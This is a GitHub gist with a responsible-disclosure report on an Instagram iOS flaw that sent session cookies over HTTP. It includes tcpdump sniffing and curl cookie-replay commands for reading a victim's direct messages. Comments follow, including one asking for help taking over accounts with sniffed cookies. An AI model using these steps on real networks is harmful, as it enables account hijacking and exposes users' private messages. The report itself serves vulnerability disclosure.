Skip to content

Instantly share code, notes, and snippets.

Last active February 24, 2023 20:44
Show Gist options
  • Save stevegraham/9a98627eebd6b09d4483 to your computer and use it in GitHub Desktop.
Save stevegraham/9a98627eebd6b09d4483 to your computer and use it in GitHub Desktop.
FB Responsible Disclosure

Instagram iOS session hijack

Instagram makes API calls to non-HTTPS endpoints with session cookies in the request headers allowing full session hijack by a malicious actor.

Steps to reproduce (on Mac OS X):

  • Jump on an open or WEP encrypted wifi access point
  • Put your network interface into promiscuous mode filtering on
     sudo tcpdump -In -i en0 -s 2048 -A dst
  • Wait for someone to use the Instagram iOS app on the same network
  • Extract cookie request header from the resulting output
  • Use sessionid cookie parameter to make any api call as that user Even https endpoints like direct messages.
     curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \
      -H 'Cookie: sessionid=REDACTED' \`

This returns the user's direct message inbox as JSON

I was able to perform a session hijack on my own account on my laptop while someone else browsed instagram on my iPhone.

I was also able to:

  • take the cookie sniffed from the iOS app
  • go to as an unlogged in user.
  • set document.cookie = $COOKIE
  • navigate to a profile
  • see I'm logged in as that user

There is some screwy behaviour where '' gets into redirect loop, I will see if I can fix that. However going to '' works and shows me as logged in.

I think this attack is extremely severe because it allows full session hijack and is easily automated. I could go to the Apple Store tomorrow and reap thousands of accounts in one day, and then use them to post spam.


  • Use SSL everywhere
  • Revoke all logged-in sessions?
Copy link

rmrhz commented Jul 28, 2014

That's a nice catch.

Copy link

@jasiek once you have a cookie, any endpoint can be authenticated with the cookie, HTTPS or HTTP.

Copy link

"Sue"? Maybe not. But in the good ol' US of A you can probably be prosecuted under this by anyone with a sufficiently large axe to grind.

Copy link

Got the instasheep domain name if you want me to point it at a github repo.

Copy link

anands commented Jul 30, 2014


Copy link


Copy link

netpawn commented Jul 31, 2014

As I read it works only on Mac though... right ?

Copy link

boserup commented Jul 31, 2014

@Mamugian Given that the Instagram user is connected via an unsecured connection (HTTP) to the API, any device capable of TCP dumping will be able to do this.

Copy link

the tool is for what platform?? pc,mac,android???

Copy link

@Mamugian could work on any unix/linux platform.

Copy link

@jlopez1286 seriously? tcpdump. Didn't expect to see such question on this gist

Copy link

Im not really experienced with packet sniffing and all this advanced networking stuff. But i was able to do the packet sniffing on an unsecured network using WireShark and get the session ID of the cookie headers. What do i have to do from here? I would be grateful if anyone could help.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment